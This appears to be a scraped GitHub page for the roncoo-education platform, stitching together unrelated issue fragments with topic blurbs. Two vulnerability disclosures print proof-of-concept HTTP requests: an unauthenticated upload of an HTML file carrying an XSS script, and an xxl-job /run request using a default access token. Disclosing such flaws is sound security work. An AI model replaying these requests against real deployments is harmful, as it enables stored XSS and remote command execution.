领课教育系统(roncoo-education)是基于领课网络多年的在线教育平台开发和运营经验打造出来的产品,致力于打造一个各行业都适用的分布式在线教育系统。系统采用前后端分离模式,前台采用vue.js为核心框架,后台采用Spring Cloud为核心框架。系统目前主要功能有课程点播功能,支持多家视频云的接入,课程附件管理功能,支持多家存储云的接入,讲师管理功能,支持讲师入驻功能,可以帮助个人或者企业快速搭建一个轻量级的在线教育平台。
Home Page: https://edu.roncoo.net
License: MIT License
![dependabot[bot] avatar](https://avatars.githubusercontent.com/in/29110?v=4 "dependabot[bot]")
我个人提个小建议:
可以创建一个接口
public interface Converter<S, T> {
T convert(S source)
}
然后实现这个接口来做转换,这样可以避免很多重复代码
[Suggested description]
File upload vulnerability in roncoo education. Because the identity is not authenticated in the uploadpic upload method of apiuploadcontroller, and the user is allowed to define the file suffix.
[Vulnerability Type]
File upload vulnerability
[Vendor of Product]
https://github.com/roncoo/roncoo-education
[Affected Product Code Base]
v9.0.0-RELEASE
[Affected Component]
POST /course/api/upload/pic HTTP/1.1
Host: localhost
Connection: close
Content-Length: 480
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxOJxWZtarWTvGvWD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
------WebKitFormBoundaryxOJxWZtarWTvGvWD
Content-Disposition: form-data; name="picFile"; filename="test.html"
Content-Type: image/jpeg
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<script>alert('xss');</script>
</body>
</html>
------WebKitFormBoundaryxOJxWZtarWTvGvWD--
[Vulnerability proof]
Use the following HTML file to initiate the upload request
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form action="https://localhost/course/api/upload/pic" method="post", enctype="multipart/form-data">
<input type="file" name="picFile" />
<input type="submit" value="上传" />
</form>
</body>
</html>
Upload any file, here my file source code is
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<script>alert('xss');</script>
</body>
</html>
The server returns the following data
{"code":200,"msg":"","data":"http://localhost/course/e89eadfcd465481d8ca7075e8e00c412.html"}
[Defective code]
npm install 和 npm run dev 都成功了 但是访问页面的时候报错404:
Error occurred when calling nuxtServerInit: Request failed with status code 404
可以升级采用elastic-job或者xxl-job
1.x使用的xl-job组件存在默认的token值,将会导致命令执行的风险
找到xxl的接口端口,默认是9998
POST /run HTTP/1.1
Host: 127.0.0.1:9998
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
XXL-JOB-ACCESS-TOKEN: education-job
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
验证这个请求是否成功
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.